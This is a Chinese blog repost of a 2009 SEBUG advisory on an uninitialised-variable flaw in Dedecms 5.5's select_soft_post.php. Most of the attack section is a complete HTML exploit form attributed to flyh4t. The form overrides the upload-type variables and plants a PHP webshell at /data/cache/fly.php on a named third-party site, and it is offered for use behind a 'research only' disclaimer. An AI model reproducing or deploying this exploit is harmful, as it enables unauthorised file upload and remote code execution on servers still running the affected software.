织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

2009年10月26日星期一 | | |

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
 
SSV ID:12518
SEBUG-Appdir:织梦(DedeCms)
发布时间:2009-10-20
影响版本:
Dedecms 5.5
漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。
<*参考
by:Flyh4t
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html>  <head>   <title>Dedecms v55 RCE Exploit Codz By flyh4t</title>  </head>  <body style="FONT-SIZE: 9pt">   ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />   <form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>    <input type='hidden' name='activepath' value='/data/cache/' />    <input type='hidden' name='cfg_basedir' value='../../' />    <input type='hidden' name='cfg_imgtype' value='php' />    <input type='hidden' name='cfg_not_allowall' value='txt' />    <input type='hidden' name='cfg_softtype' value='php' />    <input type='hidden' name='cfg_mediatype' value='php' />    <input type='hidden' name='f' value='form1.enclosure' />    <input type='hidden' name='job' value='upload' />    <input type='hidden' name='newname' value='fly.php' />    Select U Shell <input type='file' name='uploadfile' size='25' />    <input type='submit' name='sb1' value='确定' />   </form>   <br />It's just a exp for the bug of Dedecms V55...<br />   Need register_globals = on...<br />   Fun the game,get a webshell at /data/cache/fly.php...<br />  </body>  </html>
SEBUG安全建议:
暂无  请关注官方补丁
// sebug.net [2009-10-26]
 
我的QQ空间
区分一下:"Google搜索联盟"和"AdSense搜索广告"
区分一下:"Google搜索联盟"和"AdSense搜索广告" "Google搜...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]